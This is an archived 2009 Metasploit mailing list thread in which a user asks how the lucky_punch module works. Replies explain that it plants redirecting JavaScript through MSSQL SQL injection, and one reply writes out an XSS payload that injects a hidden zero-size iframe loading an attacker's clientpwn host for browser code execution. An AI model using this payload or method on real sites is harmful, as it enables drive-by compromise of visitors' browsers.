Metasploit mailing list archives
lucky punch
From: wullie19 at ntlworld.com (rogue)
Date: Thu, 2 Apr 2009 17:15:20 +0100
Hi friend just wanted to thanks a lot with your help on this I really appreciate it. -rogue
If your using XSS, its easy to use the metasploit clientpwn and just put an iframe in the XSS to load on port 80 on your affected host: http://xssvulnsite/Default.aspx?msg=<iframe src="http://clienpwnsystem" width="0" height="0" scrolling="no"></iframe> This would launch the site as normal and put a iframe that redirects toward the attackers system. Obviously don't have to use clientpwn, can pick whatever exploit you want however the user-agent functions with clientpwn is nice. Very simplistic attack for code execution on the affected browser... ________________________________ From: rogue <wullie19 at ntlworld.com> Date: Thu, 2 Apr 2009 11:40:21 -0400 To: Efrain Torres <etlownoise at gmail.com> Cc: <framework at spool.metasploit.com> Subject: Re: [framework] lucky punch Hi there Thanks for your help. Ive been looking at XSS to redirect someone from a web page to my server to launch some sort of browser attack. So this module uses sql injection on mssql to achive that? -rogueRogue, What are you trying to do with the module, can you please porvide more details so i can help you better? Basically the module is used to peform thru SQL injection (MSSQL) the modification of database tables to store javascript code that may be displayed by an application to redirect the user to a compromised webserver. ET On Thu, Apr 2, 2009 at 9:37 AM, rogue <wullie19 at ntlworld.com> wrote:Hi list. Can anyone give me some info on how the auxiliary module scanner/http/lucky_punch.rb is used? Thanks -rogue _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- lucky punch rogue (Apr 02)
- lucky punch Efrain Torres (Apr 02)
- lucky punch Efrain Torres (Apr 02)
- lucky punch rogue (Apr 02)
- lucky punch rogue (Apr 02)
- lucky punch David Kennedy (Apr 02)
- lucky punch rogue (Apr 02)
- lucky punch Efrain Torres (Apr 02)
- lucky punch Efrain Torres (Apr 02)